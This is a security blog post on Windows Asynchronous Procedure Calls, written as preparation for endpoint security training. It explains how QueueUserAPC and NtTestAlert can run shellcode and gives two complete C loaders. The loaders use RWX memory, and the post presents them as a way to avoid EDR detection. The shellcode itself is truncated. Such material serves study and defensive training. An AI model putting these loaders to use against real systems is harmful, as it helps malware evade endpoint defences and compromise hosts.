Previous

Shellcode Execution via Asynchronous Procedure Calls

As part of the preparations for my Endpoint Security Insights training, I have been looking into the topic of Asynchronous Procedure Calls (APC). Although there are already several articles on this topic, this compact blog post is intended to cover the key aspects of APCs in the context of shellcode execution with a special focus on local execution (self-injection). My aim is to explain what APCs are, how they are initiated and how APCs can be used to execute shellcode.


Disclaimer


This article is not new research; there are numerous articles on the use of APC in the context of shellcode execution (see resources). The purpose of this text is purely academic; it is for research purposes only and should in no way be used for unethical or illegal activities. I do not claim to be correct or complete.

Asynchronous Procedure Calls

Asynchronous Procedure Calls, or APC for short, are a mechanism in Windows - and possibly other operating systems, although I can't say for sure at the moment - that allows asynchronous execution of code to be scheduled. "Asynchronous" in this context means that certain operations or function calls can be initiated without the executing process or thread having to wait for those operations to complete. In contrast, in a synchronous execution model, a process or thread would start a task and then have to block the execution of further operations or wait for the current operation to complete before continuing with the next operation. The result of an asynchronous operation is then returned at a later time via a callback mechanism.

An important feature of APC on Windows is that APC within an APC queue is only executed or processed in the context of a thread if the thread is in an alertable state. To put a thread in this state, functions such as SleepEx(), WaitForSingleObjectEx(), SignalObjectAndWaitEx(), SignalObjectAndWait() and WaitForMultipleObjectsEx() can be used.

It should also be mentioned that there are different types of Asynchronous Procedure Calls on Windows, including user-mode APC and kernel-mode APC. A detailed discussion of all APC types is beyond the scope of this article. Therefore, in this article we will only focus on user-mode APC in the context of QueueUserAPC. For those who would like to learn more about the different types of APC, I recommend this article and the article by Ori Damaris that builds on it. This video also gives a good insight into APC.

Concept of APC

Basically, the question arises as to why APCs could be of interest for running shellcode via local execution or remote process injection. For the simple reason that shellcode can be executed using the QueueUserAPC() function, for example, without having to explicitly start a new thread using CreateThread() in the local context or CreateThreadEx() in the remote context. Particularly in the context of remote process injection, the execution of shellcode using a new thread can lead to detection by the EDR, e.g. through user-mode hooking or registered kernel callback routines (e.g. PsProcessNotifyRoutine() or PsThreadNotifyRoutine()).

When using user-mode APCs to execute shellcode, whether in the context of local execution (self-injection) or remote process injection, the process always starts with the creation of a new user-mode APC, e.g. using the QueueUserAPC() function. You can think of an APC as a customer queuing up at a checkout, where the first-in-first-out (FIFO) principle applies. In the second step, we want to put the current thread (main thread) into an alertable state, e.g. via WaitForSingleObjectEx(), which triggers the initiation or processing of the current APCs in the thread. The following code in C shows the simplest form of shell code execution via user-mode APCs. Please note that no emphasis is placed here on evasion in the context of RWX memory, unencrypted shellcode, etc. Of course, readers are encouraged to modify, improve and extend the code as they see fit.

// Ressources: 
// https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection

#include <windows.h>
#include <stdio.h>

int main() {

    unsigned char shellcode[] = "\xfc\x48\x83...";

        // Allocate memory for the shellcode.
    PVOID addr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Copy the shellcode into the allocated memory.
    memcpy(addr, shellcode, sizeof(shellcode));

    // Queue a User APC to the current thread.
    QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
    // PAPCFUNC is a pointer to a function that is called when the APC is executed.
    // (PAPCFUNC)addr is a cast of the shellcode memory address to a function pointer type that is compatible with APC calls.
    // GetCurrentThread() retrieves a pseudohandle for the current thread.
    // The last parameter is a NULL pointer, which means no argument is passed to the APC function.


    // This function call makes the current thread enter an alertable wait state indefinitely.
    WaitForSingleObjectEx(GetCurrentThread(), INFINITE, TRUE);
    // An alertable wait state is required for APCs to be executed. 
    // INFINITE means the wait does not time out. The thread will wait here until an APC is executed or another form of wake-up is triggered.
    // The TRUE parameter indicates that the wait is alertable, which allows APCs to be executed.

    return 0;
}

Empty APC Queue

As mentioned above, the first step is to create a new user-mode APC in the APC queue using QueueUserAPC(). Then, to initiate the APCs the thread must be set to an alertable state, e.g. using WaitForSingleObjectEx(). Only then will the asynchronous execution of the currently available APCs begin. An alternative to this is the undocumented native function NtTestAlert, which forces the processing of pending APCs in the APC queue without the need to explicitly set the thread to an alertable state. 

In other words, the primary purpose of NtTestAlert() is to check if the calling thread has any pending Asynchronous Procedure Calls queued for it, and to dispatch and execute them if there are any. If the APC queue was empty before NtTestAlert() was called, then the function simply returns with no effect. This behaviour makes NtTestAlert() useful for ensuring that all pending APCs for a thread are processed, for example before the thread performs an operation that requires a known state for the APC queue, or in our case to initiate shellcode execution via QueueUserAPC().

// Ressources: 
// https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert

#include <windows.h>
#include <stdio.h>

// Define the prototype of the NtTestAlert function.
typedef NTSTATUS(NTAPI* PFN_NTTESTALERT)();
// NTAPI is a calling convention that is used for system functions.
// PFN_NTTESTALERT is a pointer to a function that returns NTSTATUS and takes no parameters.

int main() {

    unsigned char shellcode[] = "\xfc\x48\x83...";
    // GetModuleHandleA retrieves a module handle for the specified module.
    HMODULE hNtdll = GetModuleHandleA("ntdll");
    
    // Get a pointer to the NtTestAlert function.
    PFN_NTTESTALERT NtTestAlert = (PFN_NTTESTALERT)GetProcAddress(hNtdll, "NtTestAlert");
    // hNtdll is the handle to the DLL module that contains the function.
    // "NtTestAlert" is the name of the function.

    // Allocate memory for the shellcode.
    PVOID addr = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // copy the shellcode to the allocated memory.
    memcpy(addr, shellcode, sizeof(shellcode));

    // QueueUserAPC queues a user-mode Asynchronous Procedure Call (APC) to the specified thread.
    QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL);
    // PAPCFUNC is a pointer to a function that is called when the APC is executed.
    // (PAPCFUNC)addr is a cast of the shellcode memory address to a function pointer type that is compatible with APC calls.
    // GetCurrentThread() retrieves a pseudohandle for the current thread.
    // The last parameter is a NULL pointer, which means no argument is passed to the APC function.

    NtTestAlert();

    return 0;
}

Summary

To conclude this very compact blog post, a quick summary. It has been explained that APCs can be used to execute shellcode. This makes it possible for an attacker (red teamer) to bypass the dedicated creation of a new thread via CreateThread() in the local context or CreateThreadEx() in the remote process context. Instead, the use of APCs allows the shellcode to be executed asynchronously directly in the context of the main thread. Although this article has only dealt with local execution (self-injection), I believe that this technique can be particularly useful for remote process injections in the context of evasion (defined as not prevented and not detected) of Endpoint Detection and Response (EDR) systems.

As already explained, the first step is to create a new APC using QueueUserAPC(), and the initiation can be either when the thread is put into an alertable state, or when the initiation of APCs is forced using the native NtTestAlert() function.

I hope this article has given you a little insight into how APCs work in the context of shellcode execution and thank you for reading. Until the next article.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 31.03.24 15:56:42 31.03.24
Daniel Feichter